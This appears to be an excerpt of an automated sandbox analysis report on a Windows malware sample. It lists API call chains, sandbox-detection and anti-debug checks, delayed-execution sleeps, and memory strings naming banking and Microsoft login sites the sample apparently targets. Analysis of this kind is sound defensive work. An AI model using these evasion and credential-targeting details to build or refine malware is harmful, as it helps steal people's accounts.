            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.4479582993.00000000032AE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4481211759.0000000003EDC000.00000004.10000000.00040000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480771193.000000000284C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2631846308.0000000010E8C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.2236959150.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2204810568.000000000341A000.00000004.00000020.00020000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000003.00000002.4479988906.0000000000748000.00000004.00000020.00020000.00000000.sdmp
            Source: PAGO $830.900.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: PAGO $830.900.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: PAGO $830.900.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: PAGO $830.900.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: PAGO $830.900.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00D7615E GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00D7615E
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00D909F6 push ecx; ret 0_2_00D90A09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403060 push eax; ret 2_2_00403062
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004160FC push 00000030h; retf 2_2_00416149
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041789B push C5503231h; retf 2_2_004178A3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041613C push 00000030h; retf 2_2_00416149
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D211 pushad ; ret 2_2_0040D212
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004132A3 push esi; ret 2_2_004132A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041136F push edi; retf 2_2_00411372
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417CFB push 789F05E2h; iretd 2_2_00417D02
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004135D8 push ds; retf 2_2_004135F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004135E3 push ds; retf 2_2_004135F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414594 push edi; retf 2_2_004145B7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E67B push ebp; retf 2_2_0041E67D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E61E push eax; retf 2_2_0041E647
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E6DA pushad ; ret 2_2_0041E6DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004016F6 push ss; ret 2_2_00401859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417FCB push edx; iretd 2_2_00417FCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401FF6 push ecx; ret 2_2_00401FFF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B309AD push ecx; mov dword ptr [esp], ecx2_2_03B309B6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_038B225F pushad ; ret 4_2_038B27F9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_038B27FA pushad ; ret 4_2_038B27F9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_038E09AD push ecx; mov dword ptr [esp], ecx4_2_038E09B6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_038B283D push eax; iretd 4_2_038B2858
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_038B1368 push eax; iretd 4_2_038B1369
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02D90240 push esi; ret 4_2_02D90245
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02D8E30C push edi; retf 4_2_02D8E30F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02D90580 push ds; retf 4_2_02D9058D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02D90575 push ds; retf 4_2_02D9058D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DA452B push ds; iretd 4_2_02DA454B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02D94838 push C5503231h; retf 4_2_02D94840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02D94F68 push edx; iretd 4_2_02D94F6A
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00D8EFAD GetForegroundWindow,FindWindowW,IsIconic,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,ShowWindow,0_2_00D8EFAD
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00E01B74 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00E01B74
            Source: C:\Users\user\Desktop\PAGO $830.900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PAGO $830.900.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Found API chain indicative of sandbox detection
            Source: C:\Users\user\Desktop\PAGO $830.900.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-93497
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\PAGO $830.900.exeAPI/Special instruction interceptor: Address: 13C1C8C
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7096E rdtsc 2_2_03B7096E
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 9771Jump to behavior
            Source: C:\Users\user\Desktop\PAGO $830.900.exeAPI coverage: 4.1 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 1532Thread sleep count: 201 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 1532Thread sleep time: -402000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 1532Thread sleep count: 9771 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 1532Thread sleep time: -19542000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe TID: 4308Thread sleep time: -90000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe TID: 4308Thread sleep count: 39 > 30Jump to behavior
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe TID: 4308Thread sleep time: -58500s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe TID: 4308Thread sleep count: 42 > 30Jump to behavior
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe TID: 4308Thread sleep time: -42000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DDDADC lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00DDDADC
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DAC242 FindFirstFileExW,0_2_00DAC242
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DE68AD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00DE68AD
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DE680C FindFirstFileW,FindClose,0_2_00DE680C
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DDCF94 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00DDCF94
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DDD2C7 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00DDD2C7
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DE9560 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00DE9560
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DE96BB SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00DE96BB
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DE9A49 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00DE9A49
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DE5BB5 FindFirstFileW,FindNextFileW,FindClose,0_2_00DE5BB5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02D9C2C0 FindFirstFileW,FindNextFileW,FindClose,4_2_02D9C2C0
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00D7615E GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00D7615E
            Source: 01194HH4.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: netbtugc.exe, 00000004.00000002.4483040948.000000000833B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kers - HKVMware20,11696428
            Source: 01194HH4.4.drBinary or memory string: discord.comVMware20,11696428655f
            Source: 01194HH4.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: 01194HH4.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: 01194HH4.4.drBinary or memory string: global block list test formVMware20,11696428655
            Source: 01194HH4.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: 01194HH4.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: 01194HH4.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: 01194HH4.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: netbtugc.exe, 00000004.00000002.4483040948.000000000833B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,116>
            Source: 01194HH4.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: 01194HH4.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: 01194HH4.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: 01194HH4.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: 01194HH4.4.drBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: 01194HH4.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: netbtugc.exe, 00000004.00000002.4479582993.00000000032AE000.00000004.00000020.00020000.00000000.sdmp, XXOIkqUXwzoOEy.exe, 00000006.00000002.4480010966.00000000008FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 01194HH4.4.drBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: 01194HH4.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: 01194HH4.4.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: 01194HH4.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: netbtugc.exe, 00000004.00000002.4483040948.000000000833B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: language_codeVARCHARkers - HKVMware20,11696428
            Source: firefox.exe, 00000009.00000002.2633469512.000001DAD0F3C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7
            Source: 01194HH4.4.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: netbtugc.exe, 00000004.00000002.4483040948.000000000833B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ive Brokers - NDCDYNVMware20,11696428655z
            Source: 01194HH4.4.drBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: 01194HH4.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: 01194HH4.4.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: 01194HH4.4.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: 01194HH4.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: 01194HH4.4.drBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: 01194HH4.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: 01194HH4.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: 01194HH4.4.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: 01194HH4.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: 01194HH4.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7096E rdtsc 2_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004172B3 LdrLoadDll,2_2_004172B3
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DEE9C9 BlockInput,0_2_00DEE9C9
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00D7445D GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00D7445D
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00D7615E GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00D7615E
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00D94C78 mov eax, dword ptr fs:[00000030h]0_2_00D94C78
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_013C08C8 mov eax, dword ptr fs:[00000030h]0_2_013C08C8
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_013C1F58 mov eax, dword ptr fs:[00000030h]0_2_013C1F58
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_013C1EF8 mov eax, dword ptr fs:[00000030h]0_2_013C1EF8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h]2_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h]2_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h]2_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h]2_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h]2_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h]2_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5438F mov eax, dword ptr fs:[00000030h]2_2_03B5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5438F mov eax, dword ptr fs:[00000030h]2_2_03B5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B663FF mov eax, dword ptr fs:[00000030h]2_2_03B663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h]2_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h]2_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE3DB mov ecx, dword ptr fs:[00000030h]2_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h]2_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD43D4 mov eax, dword ptr fs:[00000030h]2_2_03BD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD43D4 mov eax, dword ptr fs:[00000030h]2_2_03BD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEC3CD mov eax, dword ptr fs:[00000030h]2_2_03BEC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]2_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]2_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]2_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]2_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB63C0 mov eax, dword ptr fs:[00000030h]2_2_03BB63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0634F mov eax, dword ptr fs:[00000030h]2_2_03C0634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C310 mov ecx, dword ptr fs:[00000030h]2_2_03B2C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B50310 mov ecx, dword ptr fs:[00000030h]2_2_03B50310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h]2_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h]2_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h]2_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD437C mov eax, dword ptr fs:[00000030h]2_2_03BD437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C08324 mov eax, dword ptr fs:[00000030h]2_2_03C08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C08324 mov ecx, dword ptr fs:[00000030h]2_2_03C08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C08324 mov eax, dword ptr fs:[00000030h]2_2_03C08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C08324 mov eax, dword ptr fs:[00000030h]2_2_03C08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov ecx, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFA352 mov eax, dword ptr fs:[00000030h]2_2_03BFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD8350 mov ecx, dword ptr fs:[00000030h]2_2_03BD8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402A0 mov eax, dword ptr fs:[00000030h]2_2_03B402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402A0 mov eax, dword ptr fs:[00000030h]2_2_03B402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C062D6 mov eax, dword ptr fs:[00000030h]2_2_03C062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov ecx, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E284 mov eax, dword ptr fs:[00000030h]2_2_03B6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E284 mov eax, dword ptr fs:[00000030h]2_2_03B6E284
